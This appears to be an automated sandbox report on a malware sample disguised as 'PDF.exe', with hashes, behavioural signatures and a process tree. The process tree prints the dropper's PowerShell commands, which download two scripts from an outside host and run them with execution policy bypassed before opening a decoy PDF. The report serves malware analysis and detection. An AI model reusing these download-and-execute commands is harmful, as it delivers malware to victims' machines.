Resubmissions
21-01-2025 13:31
250121-qspexswjes 1021-01-2025 12:04
250121-n8tngasrhm 1013-07-2024 12:59
240713-p8a2ss1gpq 10Analysis
-
max time kernel
106s -
max time network
18s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
21-01-2025 13:31
Static task
static1
Behavioral task
behavioral1
Sample
PDF.exe
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
PDF.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
PDF.exe
Resource
android-x64-arm64-20240624-en
Behavioral task
behavioral4
Sample
PDF.exe
Resource
android-33-x64-arm64-20240624-en
Behavioral task
behavioral5
Sample
PDF.exe
Resource
macos-20241106-en
Behavioral task
behavioral6
Sample
PDF.exe
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral7
Sample
PDF.exe
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral8
Sample
PDF.exe
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral9
Sample
PDF.exe
Resource
debian9-mipsel-20240226-en
General
-
Target
PDF.exe
-
Size
258KB
-
MD5
34c2047d0b69ba023b700c21431accc0
-
SHA1
e34c28611707c81565cb73d8a1a46dfc3ab2495a
-
SHA256
ff9b39d07fd6e4a7f98d109664d91de9e318671da6412da85396541722d92799
-
SHA512
a1566d65beb8135edfcb5c4a09631bc17dff56db672621990a10d0eff37a0290c7e1e9705f1918a7e719cbea4b1cecc29bb8254da946108e9bd5432070cc8ca7
-
SSDEEP
6144:VbJhs7QW69hd1MMdxPe9N9uA0hu9TBrjJ0Xxne0AqGLj:VbjDhu9TV6xeJqG3
Malware Config
Extracted
http://thelustfactory.com/vns/1.ps1
Extracted
http://thelustfactory.com/vns/2.ps1
Signatures
-
pid Process 2876 powershell.exe 2752 powershell.exe 1984 powershell.exe 2224 powershell.exe -
HTTP links in PDF interactive object 1 IoCs
Detects HTTP links in interactive objects within PDF files.
resource yara_rule behavioral1/files/0x0006000000019667-57.dat pdf_with_link_action -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AcroRd32.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 1604 timeout.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 2688 AcroRd32.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 1984 powershell.exe 2224 powershell.exe 2876 powershell.exe 2752 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 2688 AcroRd32.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1984 powershell.exe Token: SeDebugPrivilege 2224 powershell.exe Token: SeDebugPrivilege 2876 powershell.exe Token: SeDebugPrivilege 2752 powershell.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 2688 AcroRd32.exe 2688 AcroRd32.exe 2688 AcroRd32.exe -
Suspicious use of WriteProcessMemory 22 IoCs
description pid Process procid_target PID 2368 wrote to memory of 1476 2368 PDF.exe 30 PID 2368 wrote to memory of 1476 2368 PDF.exe 30 PID 2368 wrote to memory of 1476 2368 PDF.exe 30 PID 1476 wrote to memory of 1984 1476 cmd.exe 32 PID 1476 wrote to memory of 1984 1476 cmd.exe 32 PID 1476 wrote to memory of 1984 1476 cmd.exe 32 PID 1476 wrote to memory of 2224 1476 cmd.exe 33 PID 1476 wrote to memory of 2224 1476 cmd.exe 33 PID 1476 wrote to memory of 2224 1476 cmd.exe 33 PID 1476 wrote to memory of 2876 1476 cmd.exe 34 PID 1476 wrote to memory of 2876 1476 cmd.exe 34 PID 1476 wrote to memory of 2876 1476 cmd.exe 34 PID 1476 wrote to memory of 2752 1476 cmd.exe 35 PID 1476 wrote to memory of 2752 1476 cmd.exe 35 PID 1476 wrote to memory of 2752 1476 cmd.exe 35 PID 1476 wrote to memory of 1604 1476 cmd.exe 36 PID 1476 wrote to memory of 1604 1476 cmd.exe 36 PID 1476 wrote to memory of 1604 1476 cmd.exe 36 PID 1476 wrote to memory of 2688 1476 cmd.exe 37 PID 1476 wrote to memory of 2688 1476 cmd.exe 37 PID 1476 wrote to memory of 2688 1476 cmd.exe 37 PID 1476 wrote to memory of 2688 1476 cmd.exe 37
Processes
-
C:\Users\Admin\AppData\Local\Temp\PDF.exeC:\Users\Admin\AppData\Local\Temp\PDF.exe DSRM -subtree1⤵
- Suspicious use of WriteProcessMemory
PID:2368 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\843D.tmp\843E.tmp\843F.bat C:\Users\Admin\AppData\Local\Temp\PDF.exe DSRM -subtree"2⤵
- Suspicious use of WriteProcessMemory
PID:1476 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object Net.WebClient).DownloadFile('http://thelustfactory.com/vns/1.ps1', 'C:\Users\Admin\AppData\Roaming\1.ps1')"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1984
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object Net.WebClient).DownloadFile('http://thelustfactory.com/vns/2.ps1', 'C:\Users\Admin\AppData\Roaming\2.ps1')"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2224
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\1.ps13⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2876
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\2.ps13⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2752
-
-
C:\Windows\system32\timeout.exetimeout /t 53⤵
- Delays execution with timeout.exe
PID:1604
-
-
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Roaming\pdf.pdf"3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:2688
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
712B
MD50e9ce5162ba7661c863a835f9d34d907
SHA10b351312ab57a02857753cab2287da680955f40d
SHA256b67f37e765a5be87d9591efdb0501f0c97aa342ad1e4c34a711828c4a505c81e
SHA5128d7c0a3cc95628cbec8a215f365c3ed86746e7b350c811ace5ea4419031adbdbe75dc7d1350d9c71db51f5cbb972db4e33b1d05e9a3e2a109c559eb065811ec0
-
Filesize
3KB
MD5dd5f955a6da56a872c69880f708e388b
SHA1594f0a28491e711cf207764fab3e998d3398f33b
SHA256cbfb8fe787aa80f8d836334cff99f699eb594ba3418bffbc2f06e0e275ac6907
SHA512495f6e0d45d750a71dafbdf6a499e55e693f698b142442989d97d33d13b57d8df8d435ab926d8a9a5c625b44329396131d32c3bbcc335b58e3d7ca4c48de65e6
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD560e60e9b7e4adfb53f27ef5e51f3ac1e
SHA1f0ad225413312fba9035a9eb8ea5ff4568425533
SHA256659d5217b051046b49d2c8bcd68300c0fb2f46765d9c97ef2dd5c91ec0f814d1
SHA512bf3fde45ef7d617b867a9dc31bad11fdd370c4160841b6f7e43405ce8284f42ef823f659cf8cdd9d09ca366d2b6726215417738cdc41e06826a7e42d67821113
-
Filesize
139KB
MD55afaf79789a776d81ec91ccbdc9fdaba
SHA16703901978dcb3dbf2d9915e1d3e066cfe712b0a
SHA25638c9792d725c45dd431699e6a3b0f0f8e17c63c9ac7331387ee30dcc6e42a511
SHA51209253eb87d097bdaa39f98cbbea3e6d83ee4641bca76c32c7eb1add17e9cb3117adb412d2e04ab251cca1fb19afa8b631d1e774b5dc8ae727f753fe2ffb5f288